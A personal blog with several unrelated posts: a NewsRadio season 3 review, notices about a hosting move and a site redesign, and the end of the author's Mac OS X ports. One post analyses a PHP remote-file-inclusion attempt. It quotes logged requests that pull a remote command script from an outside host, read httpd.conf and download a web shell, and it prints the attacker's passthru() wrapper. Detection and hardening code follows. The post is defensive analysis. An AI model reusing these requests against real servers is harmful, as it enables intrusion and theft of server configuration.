NewsRadio was probably the funniest show I’ve ever enjoyed. The timing, cynicism, and internal struggles made it so… well, in a word: brilliant.

The (albeit dated, but by design) cultural references from Soylent Green to Flowers for Algernon only made the witty dialog all the more relevant, somehow. You see that these young adults are entering their career paths, and still have (at least most of) their personalities intact. If you don’t like thinking, or a bit of slapstick humor, you won’t enjoy NewsRadio – however, even my mother has learned to enjoy the show – so much that she “borrowed” my DVDs (which I doubt I’ll ever get back). Paul Simms created magic, in the time of grunge music.

Season 3 is finally on DVD. In this season, the characters have really grown into their personas, and the story lines are fresh, and exciting. The commentaries are generally a bit weak, but still quite enjoyable – I only wish they’d tell us what the ‘secret lyrics’ are that they made to go with Mike Post’s theme music! (Ok, I’d also pay $20 more per DVD set if there was no laugh track.. that annoys the heck out of me.)

In related news, I’ve purchased a WNYX mug. Yes, I love this show; nearly as much as these folks seem to.

While browsing my logs today, I discovered someone attempting to exploit PHP’s fopen() support for URLs. This specific form of exploit dates back to at least 2003.

The relevant information (from the cached page above; it doesn’t work here, so all you’d see is the first, failed attempt):

"GET /index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?&chdir=/usr/local/apache/conf&cmd=cat%20httpd.conf HTTP/1.1"

"GET /index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?&chdir=/somewhere/writeable&cmd=wget%20http://www.havenard.net/havenard/4843term.txt HTTP/1.1"

"GET /index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?&chdir=/somewhere/writeable&cmd=mv%204843term.txt%20terminal.php HTTP/1.1"

So, I looked at the script that was being linked to (as a text file, from a Geocities site, which still has ‘blocking’ disabled for text files, for some legacy reason). Some of the code follows:

if (!empty($cmd)) {
    @passthru("$cmd 2>&1");            // run the attacker-supplied command, stderr included
    $output = ob_get_contents();       // relies on an ob_start() earlier in the full script
    if (!empty($output))
        echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));   // HTML-escape the output
}

As you can see, this script is essentially just a wrapper for passthru() (exec with the output streamed back): whatever arrives in the cmd parameter ($_GET["cmd"], which register_globals turns into a bare $cmd) is handed to the shell, plus a little output escaping. Only, not quite that smart.

It’s incredibly simple, old, and, sadly, quite effective: many people still don’t secure their sites, and blindly write code which works like the following:

if ( ! $var ) $var = "var";
require("$var.html");

The above code is beyond bad. For one, it never anchors the include to a local path, which could easily be fixed with:

require("./$var.html"); (although I still don’t agree with this method, and it STILL isn’t failsafe: the "./" prefix rules out URL wrappers, but $var can still carry "../" and pull in any .html file on the box.)

I hate global variables, but once you parse your config, you can read the whole thing into an array held in a single variable, which you don’t expose except where you have to.

This is also pretty messy: it limits you to one global variable; however, anything that can reach that variable gets everything in its array, which I consider to be bogus.

Protip: If you don’t need to open files from an external site (which you shouldn’t need to do, and if you do, use sockets or a PEAR library), turn off URL access in fopen(): set allow_url_fopen = Off in php.ini.
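To tie the three pieces together (the captured request, the "$var.html" include pattern, and what a safe version looks like), here is an added example. It is not the post’s code, the attacker’s cmd.txt, or any project’s code. It assumes PHP 7.1+, the var parameter and "$var.html" shape from the snippet above, invented page names and a throwaway page directory, and a log line reconstructed to match the first request quoted above (constructed for the demo, not taken from a live log).

```php
<?php
// Added example, not the post's, the attacker's, or any project's code.
// Assumed: PHP 7.1+, the "var" parameter and "$var.html" shape from the post's snippet,
// invented page names and a temporary page directory, and a log line reconstructed to
// match the first request quoted in the post (constructed for the demo, not a live log).
declare(strict_types=1);

// 1. The post's pattern.  With register_globals=On (the PHP 4 default) $var is filled
//    straight from ?var=..., so this is exactly the string require() is handed.
function vulnerable_include_target(array $get): string
{
    $var = $get['var'] ?? '';
    if (!$var) {
        $var = 'var';
    }
    return "$var.html";   // require("$var.html") in the original
}

// 2. Detection: pull every query parameter out of an access-log request line and
//    report the ones whose value is a scheme://... URL, which is what PHP's URL
//    wrappers (fopen, include, require) would fetch when allow_url_fopen is on
//    (on PHP >= 5.2 include/require are gated by allow_url_include instead).
function rfi_indicators(string $requestLine): array
{
    if (!preg_match('/^"?(?:GET|POST)\s+(\S+)/', $requestLine, $m)) {
        return [];
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return [];
    }
    parse_str($query, $params);
    $hits = [];
    foreach ($params as $name => $value) {
        if (is_string($value) && preg_match('#^[a-z][a-z0-9+.\-]*://#i', $value)) {
            $hits[$name] = $value;
        }
    }
    return $hits;
}

// 3. Hardened form: a fixed allowlist of page names, a fixed local directory, and a
//    realpath() containment check, so neither a URL nor ../ can escape the directory.
const ALLOWED_PAGES = ['var', 'about', 'contact'];   // invented for the demo

function safe_include_target(string $page, string $pageDir): ?string
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;   // unknown page: refuse outright rather than try to sanitise
    }
    $base = realpath($pageDir);
    $path = realpath($pageDir . '/' . $page . '.html');
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;   // missing file, or resolved outside the page directory
    }
    return $path;
}

// --- Demo ---
// Constructed log line, shaped like the first request quoted in the post.
$logLine = '"GET /index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?'
         . '&chdir=/usr/local/apache/conf&cmd=cat%20httpd.conf HTTP/1.1"';
print_r(rfi_indicators($logLine));

// Feed the captured value to the vulnerable pattern: the attacker's trailing "?"
// turns the appended ".html" into a query string, so the remote fetch still works.
echo vulnerable_include_target(['var' => 'http://www.havenard.net/havenard/hack/cmd.txt?']), "\n";

// The hardened version, against a throwaway page directory.
$dir = sys_get_temp_dir() . '/pages_' . getmypid();
mkdir($dir, 0700);
file_put_contents("$dir/about.html", "<p>about</p>\n");
var_dump(safe_include_target('about', $dir) !== null);                                   // known page
var_dump(safe_include_target('http://www.havenard.net/havenard/hack/cmd.txt?', $dir));   // URL
var_dump(safe_include_target('../../etc/passwd', $dir));                                 // traversal
unlink("$dir/about.html");
rmdir($dir);
```

Run it with the PHP CLI. rfi_indicators() flags only the l parameter (the chdir and cmd values are not URLs), vulnerable_include_target() shows the attacker’s value coming out as http://www.havenard.net/havenard/hack/cmd.txt?.html, which the URL wrapper happily fetches, and safe_include_target() returns a path only for the allowlisted page and null for the URL and the traversal attempt. The allowlist alone already makes the last two impossible; the realpath() check is belt and braces for the day someone widens the allowlist to user-supplied names.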

I’ve moved from my hosting with ICDSoft in China to ICDSoft’s USA colocation.

I updated the nameservice entries myself in parallel with the move; anyone who cached (viewed) my page within the last few hours may have up to 48 hours until it updates on their ISP’s nameserver, but there IS a forward in place to the new location with an alternative name – CSS will be broken, and the site will be ugly, but it will still be functional.

Thanks for your swift, excellent service, ICDSoft .

[Update: Everything should be seeing the ‘new’ host, and yes, it may appear ‘faster’.]

Please pardon the dust; I’ve moved out of my old software base into an entirely new, redesigned (if not prettier) system.

I have converted, and imported all of my existing articles, but there has been no easy way to (re)classify them, as they’re entirely incompatible data types. I’ve manually updated the last fifty articles, but note that browsing by article type is not yet reflective of actual content.

As I am no longer actively maintaining open source software, the old posts will eventually be reclassified as legacy and deprecated; but left for the annals of time, and those searching for information I’ve uncovered in the past.

Yes, you’ve read that right. I will no longer offer Mac OS X ports, builds, or other assistance with my own open source based efforts.

This has been a difficult decision, however, I can no longer afford the time or bandwidth once dedicated to these projects.

If you wish to take over as maintainer of any of my existing code, please contact me, and the original authors (where applicable); I’ll be more than happy to offer my existing build structure with all dependencies, and when necessary, my personal build notes and GNU Patch unified diffs.

I have notified the authors of my ported software, and will continue to host this unsupported software through March 2006.

Update: MKVToolNix, and OGMTools have found a new home. DOSBox is moving back in-house, and the Mac port of Bliss shall pass on with my silly little ‘speak’ utility.